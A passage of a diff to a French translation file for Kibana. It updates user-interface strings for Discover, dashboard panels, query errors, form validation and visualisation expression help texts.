"discover.howToSeeOtherMatchingDocumentsDescription": "Voici les {sampleSize} premiers documents correspondant à votre recherche. Veuillez affiner celle-ci pour en voir plus.", "discover.inspectorRequestDataTitleChart": "Données du graphique", "discover.inspectorRequestDataTitleDocuments": "Documents", "discover.inspectorRequestDataTitleTotalHits": "Nombre total de résultats", "discover.inspectorRequestDescriptionChart": "Cette requête interroge Elasticsearch afin de récupérer les données d'agrégation pour le graphique.", "discover.inspectorRequestDescriptionDocument": "Cette requête interroge Elasticsearch afin de récupérer les documents.", "discover.inspectorRequestDescriptionTotalHits": "Cette requête interroge Elasticsearch afin de récupérer le nombre total de résultats.", - "discover.json.codeEditorAriaLabel": "Affichage JSON en lecture seule d’un document Elasticsearch", + "discover.json.codeEditorAriaLabel": "Affichage JSON en lecture seule d’un document Elasticsearch", "discover.json.copyToClipboardLabel": "Copier dans le presse-papiers", "discover.loadingChartResults": "Chargement du graphique", "discover.loadingDocuments": "Chargement des documents", @@ -3151,7 +2282,6 @@ "discover.localMenu.saveTitle": "Enregistrer", "discover.localMenu.shareSearchDescription": "Partager la recherche", "discover.localMenu.shareTitle": "Partager", - "discover.noMatchRoute.bannerText": "L'application Discover ne reconnaît pas cet itinéraire : {route}", "discover.noMatchRoute.bannerTitleText": "Page introuvable", "discover.noResults.adjustFilters": "Modifiez les filtres.", "discover.noResults.adjustSearch": "Modifiez la requête.", @@ -3161,10 +2291,9 @@ "discover.noResults.searchExamples.noResultsBecauseOfError": "Une erreur s’est produite lors de la récupération des résultats de recherche.", "discover.noResults.searchExamples.noResultsMatchSearchCriteriaTitle": "Aucun résultat ne correspond à vos critères de recherche.", "discover.noResults.temporaryDisablingFiltersLinkText": "désactiver temporairement les filtres", - "discover.noResults.tryRemovingOrDisablingFilters": "Essayez de supprimer ou de {disablingFiltersLink}.", "discover.noResults.trySearchingForDifferentCombination": "Essayez de rechercher une autre combinaison de termes.", "discover.noResultsFound": "Résultat introuvable", - "discover.notifications.invalidTimeRangeText": "La plage temporelle spécifiée n'est pas valide (de : \"{from}\" à \"{to}\").", + "discover.notifications.invalidTimeRangeText": "La plage temporelle spécifiée n'est pas valide (de : \"{from}\" à \"{to}\").", "discover.notifications.invalidTimeRangeTitle": "Plage temporelle non valide", "discover.notifications.notSavedSearchTitle": "La recherche \"{savedSearchTitle}\" n'a pas été enregistrée.", "discover.notifications.savedSearchTitle": "La recherche \"{savedSearchTitle}\" a été enregistrée.", @@ -3173,52 +2302,40 @@ "discover.openOptionsPopover.gotToSettings": "Afficher les paramètres de Discover", "discover.openOptionsPopover.tryDocumentExplorer": "Testez l'explorateur de documents", "discover.pageTitleWithoutSavedSearch": "Discover - Recherche non encore enregistrée", - "discover.pageTitleWithSavedSearch": "Discover - {savedSearchTitle}", - "discover.partialHits": "≥ {formattedHits} {hits, plural, one {résultat} other {résultats}}", "discover.reloadSavedSearchButton": "Réinitialiser la recherche", "discover.removeColumnLabel": "Supprimer la colonne", "discover.rootBreadcrumb": "Découverte", "discover.sampleData.viewLinkLabel": "Découverte", "discover.savedSearch.savedObjectName": "Recherche enregistrée", - "discover.savedSearchAliasMatchRedirect.objectNoun": "Recherche {savedSearch}", "discover.savedSearchEmbeddable.action.viewSavedSearch.displayName": "Ouvrir dans Discover", - "discover.savedSearchURLConflictCallout.objectNoun": "Recherche {savedSearch}", - "discover.searchGenerationWithDescription": "Tableau généré par la recherche {searchTitle}", - "discover.searchGenerationWithDescriptionGrid": "Tableau généré par la recherche {searchTitle} ({searchDescription})", "discover.searchingTitle": "Recherche", "discover.selectColumnHeader": "Sélectionner la colonne", - "discover.selectedDocumentsNumber": "{nr} documents sélectionnés", "discover.showAllDocuments": "Afficher tous les documents", "discover.showChart": "Afficher le graphique", "discover.showErrorMessageAgain": "Afficher le message d'erreur", - "discover.showingDefaultDataViewWarningDescription": "Affichage de la vue de données par défaut : \"{loadedDataViewTitle}\" ({loadedDataViewId})", - "discover.showingSavedDataViewWarningDescription": "Affichage de la vue de données enregistrée : \"{ownDataViewTitle}\" ({ownDataViewId})", "discover.showSelectedDocumentsOnly": "Afficher uniquement les documents sélectionnés", - "discover.singleDocRoute.errorMessage": "Pas de modèle d'indexation correspondant pour l'ID {dataViewId}", "discover.singleDocRoute.errorTitle": "Une erreur s'est produite", "discover.skipToBottomButtonLabel": "Atteindre la fin du tableau", "discover.sourceViewer.errorMessage": "Impossible de récupérer les données pour le moment. Actualisez l'onglet et réessayez.", "discover.sourceViewer.errorMessageTitle": "Une erreur s'est produite.", "discover.sourceViewer.refresh": "Actualiser", "discover.timeIntervals": "Intervalles de temps", - "discover.timeIntervalWithValue": "Intervalle de temps : {timeInterval}", "discover.timeIntervalWithValueWarning": "Avertissement", "discover.toggleSidebarAriaLabel": "Activer/Désactiver la barre latérale", - "discover.topNav.openOptionsPopover.documentExplorerDisabledHint": "Saviez-vous que Discover possède un nouvel Explorateur de documents avec un meilleur tri des données, des colonnes redimensionnables et une vue en plein écran ? Vous pouvez modifier le mode d'affichage dans les Paramètres avancés.", + "discover.topNav.openOptionsPopover.documentExplorerDisabledHint": "Saviez-vous que Discover possède un nouvel Explorateur de documents avec un meilleur tri des données, des colonnes redimensionnables et une vue en plein écran ? Vous pouvez modifier le mode d'affichage dans les Paramètres avancés.", "discover.topNav.openOptionsPopover.documentExplorerEnabledHint": "Vous pouvez revenir à l'affichage Discover classique dans les Paramètres avancés.", "discover.topNav.openSearchPanel.manageSearchesButtonLabel": "Gérer les recherches", "discover.topNav.openSearchPanel.noSearchesFoundDescription": "Aucune recherche correspondante trouvée.", "discover.topNav.openSearchPanel.openSearchTitle": "Ouvrir une recherche", - "discover.topNav.optionsPopover.currentViewMode": "{viewModeLabel} : {currentViewMode}", "discover.topNav.optionsPopover.discoverViewModeLabel": "Mode d'affichage Discover", "discover.uninitializedRefreshButtonText": "Actualiser les données", "discover.uninitializedText": "Saisissez une requête, ajoutez quelques filtres, ou cliquez simplement sur Actualiser afin d’extraire les résultats pour la requête en cours.", "discover.uninitializedTitle": "Commencer la recherche", - "discover.utils.formatHit.moreFields": "et {count} {count, plural, one {autre champ} other {autres champs}}", - "discover.valueIsNotConfiguredDataViewIDWarningTitle": "{stateVal} n'est pas un ID de vue de données configuré", "discover.viewAlert.alertRuleChangedWarnDescription": "Les documents affichés peuvent ne pas correspondre à ceux ayant déclenché l'alerte\n car la configuration de la règle a été modifiée.", "discover.viewAlert.alertRuleChangedWarnTitle": "La règle d'alerte a été modifiée", "discover.viewAlert.alertRuleFetchErrorTitle": "Erreur lors de la récupération de la règle d'alerte", + "discover.viewAlert.dataViewChangedWarnDescription": "La vue de données a été mise à jour après la dernière mise à jour de la règle d'alerte.", + "discover.viewAlert.dataViewChangedWarnTitle": "La vue de données a changé", "discover.viewAlert.dataViewErrorTitle": "Erreur lors de la récupération de la vue de données", "discover.viewAlert.documentsMayVaryInfoDescription": "Les documents affichés peuvent différer de ceux ayant déclenché l'alerte.\n Des documents ont peut-être été ajoutés ou supprimés.", "discover.viewAlert.documentsMayVaryInfoTitle": "Les documents affichés peuvent varier", @@ -3227,12 +2344,18 @@ "discover.viewModes.fieldStatistics.betaTitle": "Bêta", "discover.viewModes.fieldStatistics.label": "Statistiques de champ", "discover.viewModes.legend": "Modes d'affichage", + "embeddableApi.addPanel.savedObjectAddedToContainerSuccessMessageTitle": "{savedObjectName} a été ajouté.", + "embeddableApi.attributeService.saveToLibraryError": "Une erreur s'est produite lors de l'enregistrement. Erreur : {errorMessage}.", + "embeddableApi.errors.embeddableFactoryNotFound": "Impossible de charger {type}. Veuillez effectuer une mise à niveau vers la distribution par défaut d'Elasticsearch et de Kibana avec la licence appropriée.", + "embeddableApi.panel.editPanel.displayName": "Modifier {value}", + "embeddableApi.panel.editTitleAriaLabel": "Cliquez pour modifier le titre : {title}", + "embeddableApi.panel.enhancedDashboardPanelAriaLabel": "Panneau du tableau de bord : {title}", + "embeddableApi.panel.optionsMenu.panelOptionsButtonAriaLabelWithIndex": "Options pour le panneau {index}", + "embeddableApi.panel.optionsMenu.panelOptionsButtonEnhancedAriaLabel": "Options de panneau pour {title}", "embeddableApi.addPanel.createNewDefaultOption": "Créer", "embeddableApi.addPanel.displayName": "Ajouter un panneau", "embeddableApi.addPanel.noMatchingObjectsMessage": "Aucun objet correspondant trouvé.", - "embeddableApi.addPanel.savedObjectAddedToContainerSuccessMessageTitle": "{savedObjectName} a été ajouté.", "embeddableApi.addPanel.Title": "Ajouter depuis la bibliothèque", - "embeddableApi.attributeService.saveToLibraryError": "Une erreur s'est produite lors de l'enregistrement. Erreur : {errorMessage}", "embeddableApi.contextMenuTrigger.description": "Un menu contextuel cliquable dans l’angle supérieur droit du panneau.", "embeddableApi.contextMenuTrigger.title": "Menu contextuel", "embeddableApi.customizePanel.action.displayName": "Modifier le titre du panneau", @@ -3245,18 +2368,13 @@ "embeddableApi.customizeTitle.optionsMenuForm.panelTitleFormRowLabel": "Titre du panneau", "embeddableApi.customizeTitle.optionsMenuForm.panelTitleInputAriaLabel": "Les modifications apportées à cette entrée sont appliquées immédiatement. Appuyez sur Entrée pour quitter.", "embeddableApi.customizeTitle.optionsMenuForm.resetCustomDashboardButtonLabel": "Réinitialiser le titre", - "embeddableApi.errors.embeddableFactoryNotFound": "Impossible de charger {type}. Veuillez effectuer une mise à niveau vers la distribution par défaut d'Elasticsearch et de Kibana avec la licence appropriée.", "embeddableApi.errors.paneldoesNotExist": "Panneau introuvable", "embeddableApi.helloworld.displayName": "bonjour", "embeddableApi.panel.dashboardPanelAriaLabel": "Panneau du tableau de bord", - "embeddableApi.panel.editPanel.displayName": "Modifier {value}", - "embeddableApi.panel.editTitleAriaLabel": "Cliquez pour modifier le titre : {title}", - "embeddableApi.panel.enhancedDashboardPanelAriaLabel": "Panneau du tableau de bord : {title}", + "embeddableApi.panel.errorEmbeddable.message": "Une erreur s'est produite. En savoir plus", "embeddableApi.panel.inspectPanel.displayName": "Inspecter", "embeddableApi.panel.inspectPanel.untitledEmbeddableFilename": "sans titre", "embeddableApi.panel.optionsMenu.panelOptionsButtonAriaLabel": "Options de panneau", - "embeddableApi.panel.optionsMenu.panelOptionsButtonAriaLabelWithIndex": "Options pour le panneau {index}", - "embeddableApi.panel.optionsMenu.panelOptionsButtonEnhancedAriaLabel": "Options de panneau pour {title}", "embeddableApi.panel.placeholderTitle": "[Aucun titre]", "embeddableApi.panel.removePanel.displayName": "Supprimer du tableau de bord", "embeddableApi.panelBadgeTrigger.description": "Des actions apparaissent dans la barre de titre lorsqu'un élément pouvant être intégré est chargé dans un panneau.", @@ -3270,12 +2388,14 @@ "embeddableApi.selectRangeTrigger.title": "Sélection de la plage", "embeddableApi.valueClickTrigger.description": "Un point de données cliquable sur la visualisation", "embeddableApi.valueClickTrigger.title": "Clic unique", + "esQuery.kql.errors.syntaxError": "{expectedList} attendu, mais {foundInput} détecté.", "esQuery.kql.errors.endOfInputText": "fin de l'entrée", "esQuery.kql.errors.fieldNameText": "nom du champ", "esQuery.kql.errors.literalText": "littéral", - "esQuery.kql.errors.syntaxError": "{expectedList} attendu, mais {foundInput} détecté.", "esQuery.kql.errors.valueText": "valeur", "esQuery.kql.errors.whitespaceText": "espace", + "esUi.forms.fieldValidation.indexNameInvalidCharactersError": "Le nom de l'index contient {characterListLength, plural, one {le caractère non valide} other {les caractères non valides}} {characterList}.", + "esUi.forms.fieldValidation.indexPatternInvalidCharactersError": "Le modèle d'indexation contient {characterListLength, plural, one {le caractère non valide} other {les caractères non valides}} {characterList}.", "esUi.cronEditor.cronDaily.fieldHour.textAtLabel": "À", "esUi.cronEditor.cronDaily.fieldTimeLabel": "Heure", "esUi.cronEditor.cronDaily.hourSelectLabel": "Heure", @@ -3324,10 +2444,8 @@ "esUi.cronEditor.month.september": "septembre", "esUi.cronEditor.textEveryLabel": "Chaque", "esUi.forms.comboBoxField.placeHolderText": "Saisir, puis appuyer sur \"ENTRÉE\"", - "esUi.forms.fieldValidation.indexNameInvalidCharactersError": "Le nom de l'index contient {characterListLength, plural, one {le caractère non valide} other {les caractères non valides}} {characterList}.", "esUi.forms.fieldValidation.indexNameSpacesError": "Le nom de l'index ne peut pas contenir d'espaces.", - "esUi.forms.fieldValidation.indexNameStartsWithDotError": "Le nom de l'index ne peut pas commencer par un point (.).", - "esUi.forms.fieldValidation.indexPatternInvalidCharactersError": "Le modèle d'indexation contient {characterListLength, plural, one {le caractère non valide} other {les caractères non valides}} {characterList}.", + "esUi.forms.fieldValidation.indexNameStartsWithDotError": "Le nom de l'index ne peut pas commencer par un point (.).", "esUi.forms.fieldValidation.indexPatternSpacesError": "Le modèle d'indexation ne peut pas contenir d'espaces.", "esUi.formWizard.backButtonLabel": "Retour", "esUi.formWizard.nextButtonLabel": "Suivant", @@ -3337,25 +2455,13 @@ "esUi.viewApiRequest.closeButtonLabel": "Fermer", "esUi.viewApiRequest.copyToClipboardButton": "Copier dans le presse-papiers", "esUi.viewApiRequest.openInConsoleButton": "Ouvrir dans la console", - "eventAnnotation.group.args.annotationConfigs": "Configurations d'annotations", - "eventAnnotation.group.description": "Groupe d'annotations d'événement", - "eventAnnotation.manualAnnotation.args.color": "Couleur de la ligne", - "eventAnnotation.manualAnnotation.args.endTime": "Horodatage de l'annotation de plage", - "eventAnnotation.manualAnnotation.args.icon": "Icône facultative utilisée pour les lignes d'annotation", - "eventAnnotation.manualAnnotation.args.isHidden": "Basculer pour masquer l'annotation", - "eventAnnotation.manualAnnotation.args.label": "Nom de l'annotation", - "eventAnnotation.manualAnnotation.args.lineStyle": "Style de la ligne d'annotation", - "eventAnnotation.manualAnnotation.args.lineWidth": "Largeur de la ligne d'annotation", - "eventAnnotation.manualAnnotation.args.textVisibility": "Visibilité de l'étiquette sur la ligne d'annotation", - "eventAnnotation.manualAnnotation.args.time": "Horodatage de l'annotation", - "eventAnnotation.manualAnnotation.defaultAnnotationLabel": "Événement", - "eventAnnotation.manualAnnotation.description": "Configurer l'annotation manuelle", - "expressionError.errorComponent.description": "Échec de l'expression avec le message :", - "expressionError.errorComponent.title": "Oups ! Échec de l'expression", - "expressionError.renderer.debug.displayName": "Débogage", - "expressionError.renderer.debug.helpDescription": "Présenter une sortie de débogage formatée {JSON}", + "expressionError.renderer.debug.helpDescription": "Générer un rendu de sortie de débogage au format {JSON}", + "expressionError.errorComponent.description": "Échec de l'expression avec le message :", + "expressionError.errorComponent.title": "Oups ! Échec de l'expression", + "expressionError.renderer.debug.displayName": "Déboguer", "expressionError.renderer.error.displayName": "Informations sur l'erreur", "expressionError.renderer.error.helpDescription": "Présenter les données de l'erreur d'une manière utile pour les utilisateurs", + "expressionGauge.functions.gauge.errors.centralMajorNotSupportedForShapeError": "Les champs \"centralMajor\" et \"centralMajorMode\" ne sont pas pris en charge par la forme \"{shape}\"", "expressionGauge.functions.gauge.args.centralMajor.help": "Spécifie la valeur centralMajor du graphique de jauge affiché dans le graphique.", "expressionGauge.functions.gauge.args.centralMajorMode.help": "Spécifie le mode de centralMajor", "expressionGauge.functions.gauge.args.colorMode.help": "Si la valeur est définie sur palette, les couleurs de celles-ci seront appliquées aux bandes", @@ -3370,7 +2476,6 @@ "expressionGauge.functions.gauge.args.palette.help": "Fournit des couleurs pour les valeurs", "expressionGauge.functions.gauge.args.shape.help": "Type de graphique de jauge", "expressionGauge.functions.gauge.args.ticksPosition.help": "Spécifie l'emplacement des coches", - "expressionGauge.functions.gauge.errors.centralMajorNotSupportedForShapeError": "Les champs \"centralMajor\" et \"centralMajorMode\" ne sont pas pris en charge par la forme \"{shape}\"", "expressionGauge.functions.gauge.help": "Visualisation de la jauge", "expressionGauge.functions.gauge.percentageMode.help": "Active le mode de pourcentage relatif", "expressionGauge.functions.gauge.respectRanges.help": "Respecter les valeurs max. et min. des plages", @@ -3382,62 +2487,41 @@ "expressionGauge.renderer.chartCannotRenderEqual": "Les valeurs minimale et maximale ne peuvent pas être égales.", "expressionGauge.renderer.chartCannotRenderMinGreaterMax": "La valeur minimale ne peut pas être supérieure à la valeur maximale.", "expressionGauge.renderer.visualizationName": "Jauge", - "expressionHeatmap.function.args.addTooltipHelpText": "Afficher l'infobulle au survol", - "expressionHeatmap.function.args.grid.isCellLabelVisible.help": "Spécifie si l'étiquette de cellule est visible ou non.", - "expressionHeatmap.function.args.grid.isXAxisLabelVisible.help": "Spécifie si les étiquettes de l'axe X sont visibles ou non.", - "expressionHeatmap.function.args.grid.isXAxisTitleVisible.help": "Spécifie si le titre de l'axe X est visible ou non.", - "expressionHeatmap.function.args.grid.isYAxisLabelVisible.help": "Spécifie si les étiquettes de l'axe Y sont visibles ou non.", - "expressionHeatmap.function.args.grid.isYAxisTitleVisible.help": "Spécifie si le titre de l'axe Y est visible ou non.", - "expressionHeatmap.function.args.grid.strokeColor.help": "Spécifie la couleur de trait de la grille", - "expressionHeatmap.function.args.grid.strokeWidth.help": "Spécifie la largeur de trait de la grille", - "expressionHeatmap.function.args.grid.xTitle.help": "Spécifie le titre de l'axe X", - "expressionHeatmap.function.args.grid.yTitle.help": "Spécifie le titre de l'axe Y", - "expressionHeatmap.function.args.highlightInHoverHelpText": "Cette option permet de mettre en surbrillance les plages de la même couleur sur le survol de la légende", - "expressionHeatmap.function.args.lastRangeIsRightOpen": "Si elle est définie comme vraie, la dernière valeur de la gamme sera grande ouverte", - "expressionHeatmap.function.args.legend.isVisible.help": "Spécifie si la légende est visible ou non.", - "expressionHeatmap.function.args.legend.maxLines.help": "Spécifie le nombre de lignes par élément de légende.", - "expressionHeatmap.function.args.legend.position.help": "Spécifie la position de la légende.", - "expressionHeatmap.function.args.legend.shouldTruncate.help": "Spécifie si les éléments de légende doivent être tronqués ou non.", - "expressionHeatmap.function.args.legendSize.help": "Spécifie la taille de la légende.", - "expressionHeatmap.function.args.splitColumnAccessorHelpText": "L'identifiant de la colonne fractionnée ou la dimension correspondante", - "expressionHeatmap.function.args.splitRowAccessorHelpText": "L'identifiant de la ligne fractionnée ou la dimension correspondante", - "expressionHeatmap.function.args.valueAccessorHelpText": "l'identifiant de la colonne de valeurs ou la dimension correspondante", - "expressionHeatmap.function.args.xAccessorHelpText": "l'identifiant de la colonne de l'axe X ou la dimension correspondante", - "expressionHeatmap.function.args.yAccessorHelpText": "l'identifiant de la colonne de l'axe Y ou la dimension correspondante", - "expressionHeatmap.function.dimension.metric": "Indicateur", - "expressionHeatmap.function.dimension.splitColumn": "Diviser par colonne", - "expressionHeatmap.function.dimension.splitRow": "Diviser par ligne", - "expressionHeatmap.function.dimension.xaxis": "Axe X", - "expressionHeatmap.function.dimension.yaxis": "Axe Y", - "expressionHeatmap.function.gridConfig.help": "Configurez la disposition de la carte thermique.", - "expressionHeatmap.function.help": "Visualisation de la carte thermique", - "expressionHeatmap.function.legendConfig.help": "Configurez la légende du graphique.", - "expressionHeatmap.function.palette.help": "Fournit des couleurs pour les valeurs, basées sur les limites.", - "expressionHeatmap.function.percentageMode.help": "Lorsque cette option est activée, l'infobulle et les légendes apparaissent sous forme de pourcentages.", - "expressionHeatmap.functions.args.ariaLabelHelpText": "Spécifie l'attribut aria-label de la carte thermique.", - "expressionHeatmap.visualizationName": "Carte thermique", "expressionImage.functions.image.args.dataurlHelpText": "L'{URL} {https} ou l'{URL} de données {BASE64} d'une image.", - "expressionImage.functions.image.args.modeHelpText": "{contain} affiche l'image entière, mise à l’échelle. {cover} remplit le conteneur avec l'image, en rognant les côtés ou le bas si besoin. {stretch} redimensionne la hauteur et la largeur de l'image pour correspondre à 100 % du conteneur.", + "expressionImage.functions.image.args.modeHelpText": "{contain} affiche l'image entière, mise à l’échelle. {cover} remplit le conteneur avec l'image, en rognant les côtés ou le bas si besoin. {stretch} redimensionne la hauteur et la largeur de l'image pour correspondre à 100 % du conteneur.", "expressionImage.functions.image.invalidImageModeErrorMessage": "\"mode\" doit être défini sur \"{contain}\", \"{cover}\" ou \"{stretch}\".", "expressionImage.functions.imageHelpText": "Affiche une image. Spécifiez une ressource d'image sous la forme d'une {URL} de données {BASE64}, ou saisissez une sous-expression.", "expressionImage.renderer.image.displayName": "Image", "expressionImage.renderer.image.helpDescription": "Présenter une image", "expressionMetric.functions.metric.args.labelFontHelpText": "Les propriétés de la police {CSS} pour l'étiquette. Par exemple, {FONT_FAMILY} ou {FONT_WEIGHT}.", - "expressionMetric.functions.metric.args.labelHelpText": "Le texte décrivant l'indicateur.", "expressionMetric.functions.metric.args.metricFontHelpText": "Les propriétés de la police {CSS} pour l'indicateur. Par exemple, {FONT_FAMILY} ou {FONT_WEIGHT}.", "expressionMetric.functions.metric.args.metricFormatHelpText": "Une chaîne de format {NUMERALJS}. Par exemple, {example1} ou {example2}.", + "expressionMetric.functions.metric.args.labelHelpText": "Le texte décrivant l'indicateur.", "expressionMetric.functions.metricHelpText": "Affiche un nombre sur une étiquette.", "expressionMetric.renderer.metric.displayName": "Indicateur", "expressionMetric.renderer.metric.helpDescription": "Présenter un nombre sur une étiquette", + "expressionMetricVis.errors.unsupportedColumnFormat": "Expression de visualisation de l'indicateur - Format de colonne non pris en charge : \"{id}\"", + "expressionMetricVis.function.breakdownBy.help": "La dimension contenant les étiquettes des sous-catégories.", + "expressionMetricVis.function.color.help": "Fournit une couleur de visualisation statique. Remplacé par la palette.", + "expressionMetricVis.function.dimension.maximum": "Maximum", "expressionMetricVis.function.dimension.metric": "Indicateur", + "expressionMetricVis.function.dimension.secondaryMetric": "Indicateur secondaire", "expressionMetricVis.function.dimension.splitGroup": "Diviser le groupe", "expressionMetricVis.function.help": "Visualisation de l'indicateur", - "expressionMetricVis.function.metric.help": "configuration des dimensions d’indicateur", + "expressionMetricVis.function.max.help.": "La dimension contenant la valeur maximale.", + "expressionMetricVis.function.metric.help": "L’indicateur principal.", + "expressionMetricVis.function.minTiles.help": "Spécifie le nombre minimum de tuiles dans la grille d’indicateur, quelles que soient les données d'entrée.", + "expressionMetricVis.function.numCols.help": "Spécifie le nombre maximum de colonnes dans la grille d’indicateur.", "expressionMetricVis.function.palette.help": "Fournit des couleurs pour les valeurs, basées sur les limites.", - "expressionPartitionVis.legend.filterForValueButtonAriaLabel": "Filtrer sur la valeur", + "expressionMetricVis.function.progressDirection.help": "La direction dans laquelle la barre de progression doit croître.", + "expressionMetricVis.function.secondaryMetric.help": "L’indicateur secondaire (affiché au-dessus de l’indicateur principal).", + "expressionMetricVis.function.secondaryPrefix.help": "Texte facultatif à afficher avant secondaryMetric.", + "expressionMetricVis.function.subtitle.help": "Le sous-titre pour un indicateur unique. Remplacé si breakdownBy est spécifié.", "expressionPartitionVis.legend.filterOptionsLegend": "{legendDataLabel}, options de filtre", - "expressionPartitionVis.legend.filterOutValueButtonAriaLabel": "Exclure la valeur", "expressionPartitionVis.negativeValuesFound": "Le graphique {chartType} ne peut pas rendre des valeurs négatives.", + "expressionPartitionVis.reusable.function.errors.moreThenNumberBuckets": "Les compartiments de plus de {maxLength} ne sont pas pris en charge.", + "expressionPartitionVis.legend.filterForValueButtonAriaLabel": "Filtrer sur la valeur", + "expressionPartitionVis.legend.filterOutValueButtonAriaLabel": "Exclure la valeur", "expressionPartitionVis.partitionLabels.function.args.last_level.help": "Afficher les étiquettes de niveau supérieur uniquement pour les camemberts/graphiques en anneau", "expressionPartitionVis.partitionLabels.function.args.percentDecimals.help": "Définit le nombre de décimales qui s'affichent pour les valeurs sous forme de pourcentage.", "expressionPartitionVis.partitionLabels.function.args.position.help": "Définit la position des étiquettes.", @@ -3471,7 +2555,6 @@ "expressionPartitionVis.reusable.function.dimension.metric": "Taille de section", "expressionPartitionVis.reusable.function.dimension.splitcolumn": "Division de colonne", "expressionPartitionVis.reusable.function.dimension.splitrow": "Division de ligne", - "expressionPartitionVis.reusable.function.errors.moreThenNumberBuckets": "Les compartiments de plus de {maxLength} ne sont pas pris en charge.", "expressionPartitionVis.reusable.function.errors.splitRowAndColumnSpecified": "Une ligne fractionnée et une colonne sont spécifiées. l'expression n'en prend en charge qu’une à la fois.", "expressionPartitionVis.reusable.functions.args.ariaLabelHelpText": "Spécifie l'attribut aria-label du graphique.", "expressionPartitionVis.waffle.function.args.bucketHelpText": "Configuration des dimensions de compartiment", @@ -3487,18 +2570,31 @@ "expressionRevealImage.functions.revealImage.args.emptyImageHelpText": "Une image d'arrière-plan facultative à révéler. Spécifiez une ressource d'image sous la forme d’une {URL} de données \"{BASE64}\", ou saisissez une sous-expression.", "expressionRevealImage.functions.revealImage.args.imageHelpText": "L'image à révéler. Spécifiez une ressource d'image sous la forme d'une {URL} de données {BASE64}, ou saisissez une sous-expression.", "expressionRevealImage.functions.revealImage.args.originHelpText": "La position à laquelle démarrer le remplissage de l'image. Par exemple, {list} ou {end}.", - "expressionRevealImage.functions.revealImage.invalidImageUrl": "URL d'image non valide : \"{imageUrl}\".", - "expressionRevealImage.functions.revealImage.invalidPercentErrorMessage": "Valeur non valide : \"{percent}\". Le pourcentage doit être compris entre 0 et 1.", + "expressionRevealImage.functions.revealImage.invalidImageUrl": "URL d'image non valide : \"{imageUrl}\".", + "expressionRevealImage.functions.revealImage.invalidPercentErrorMessage": "Valeur non valide : \"{percent}\". Le pourcentage doit être compris entre 0 et 1.", "expressionRevealImage.functions.revealImageHelpText": "Configure un élément de révélation d'image.", "expressionRevealImage.renderer.revealImage.displayName": "Révélation d'image", "expressionRevealImage.renderer.revealImage.helpDescription": "Révèle un pourcentage d'une image pour concevoir un graphique à jauge personnalisé.", + "expressions.execution.functionDisabled": "Fonction {fnName} désactivée.", + "expressions.execution.functionNotFound": "Fonction {fnName} introuvable.", + "expressions.functions.createTableHelpText": "Crée une table de données avec une liste de colonnes, et une ou plusieurs lignes vides. Pour générer les lignes, utilisez {mapColumnFn} ou {mathColumnFn}.", + "expressions.functions.font.args.familyHelpText": "Une chaîne de police Internet {css} acceptable", + "expressions.functions.font.args.weightHelpText": "L’épaisseur de la police. Par exemple, {list} ou {end}.", + "expressions.functions.mapColumn.args.expressionHelpText": "Une expression qui est exécutée sur chaque ligne, fournie avec un contexte {DATATABLE} de ligne unique et retournant la valeur de la cellule.", + "expressions.functions.mapColumnHelpText": "Ajoute une colonne calculée comme le résultat d'autres colonnes. Des modifications ne sont apportées que si des arguments sont fournis. Voir également {alterColumnFn} et {staticColumnFn}.", + "expressions.functions.math.args.expressionHelpText": "Une expression {TINYMATH} évaluée. Voir {TINYMATH_URL}.", + "expressions.functions.math.args.onErrorHelpText": "Si l’évaluation {TINYMATH} échoue ou renvoie NaN, la valeur de retour est spécifiée par onError. Lors de la ''génération'', une exception est levée, terminant l'exécution de l'expression (par défaut).", + "expressions.functions.math.tooManyResultsErrorMessage": "Les expressions doivent retourner un nombre unique. Essayez d'englober votre expression dans {mean} ou {sum}.", + "expressions.functions.mathColumn.arrayValueError": "Impossible de réaliser le calcul sur les valeurs du tableau à {name}", + "expressions.functions.mathColumnHelpText": "Ajoute une colonne en évaluant {tinymath} sur chaque ligne. Cette fonction est optimisée pour les mathématiques et livre de meilleures performances par rapport à l'utilisation d'une expression mathématique dans {mapColumnFn}.", + "expressions.functions.mathHelpText": "Interprète une expression mathématique {TINYMATH} à l'aide d'un {TYPE_NUMBER} ou d'une {DATATABLE} en tant que {CONTEXT}. Les colonnes {DATATABLE} peuvent être recherchées d’après leur nom. Si {CONTEXT} est un nombre, il est disponible en tant que {value}.", + "expressions.functions.seriesCalculations.columnConflictMessage": "L'ID de colonne de sortie {columnId} existe déjà. Veuillez choisir un autre ID de colonne.", + "expressions.functions.uiSetting.error.parameter": "Paramètre \"{parameter}\" non valide.", + "expressions.types.number.fromStringConversionErrorMessage": "Impossible de cataloguer la chaîne \"{string}\" en nombre", "expressions.defaultErrorRenderer.errorTitle": "Erreur dans la visualisation", - "expressions.execution.functionDisabled": "Fonction {fnName} désactivée.", - "expressions.execution.functionNotFound": "Fonction {fnName} introuvable.", "expressions.functions.createTable.args.idsHelpText": "ID de colonne à générer dans l'ordre de position. L'ID représente la clé dans la ligne.", "expressions.functions.createTable.args.nameHelpText": "Noms de colonne à générer dans l'ordre de position. Ces noms n'ont pas besoin d'être uniques et, en l’absence de noms, les ID sont utilisés par défaut.", "expressions.functions.createTable.args.rowCountText": "Le nombre de lignes vides à ajouter au tableau, pour y attribuer une valeur plus tard", - "expressions.functions.createTableHelpText": "Crée une table de données avec une liste de colonnes, et une ou plusieurs lignes vides. Pour générer les lignes, utilisez {mapColumnFn} ou {mathColumnFn}.", "expressions.functions.cumulativeSum.args.byHelpText": "Colonne par laquelle diviser le calcul de la somme cumulée", "expressions.functions.cumulativeSum.args.inputColumnIdHelpText": "Colonne pour laquelle calculer la somme cumulée", "expressions.functions.cumulativeSum.args.outputColumnIdHelpText": "Colonne dans laquelle stocker le résultat de la somme cumulée", @@ -3511,35 +2607,25 @@ "expressions.functions.derivative.help": "Calcule la dérivée d'une colonne dans un tableau de données.", "expressions.functions.font.args.alignHelpText": "L'alignement horizontal du texte.", "expressions.functions.font.args.colorHelpText": "La couleur du texte.", - "expressions.functions.font.args.familyHelpText": "Une chaîne de police Internet {css} acceptable", - "expressions.functions.font.args.italicHelpText": "Mettre le texte en italique ?", + "expressions.functions.font.args.italicHelpText": "Mettre le texte en italique ?", "expressions.functions.font.args.lHeightHelpText": "La hauteur de la ligne en pixels", "expressions.functions.font.args.sizeHelpText": "La taille de la police", "expressions.functions.font.args.sizeUnitHelpText": "l'unité de la taille de la police", - "expressions.functions.font.args.underlineHelpText": "Souligner le texte ?", - "expressions.functions.font.args.weightHelpText": "L’épaisseur de la police. Par exemple, {list} ou {end}.", - "expressions.functions.font.invalidFontWeightErrorMessage": "Épaisseur de police non valide : \"{weight}\"", - "expressions.functions.font.invalidSizeUnitErrorMessage": "Unité de taille non valide : 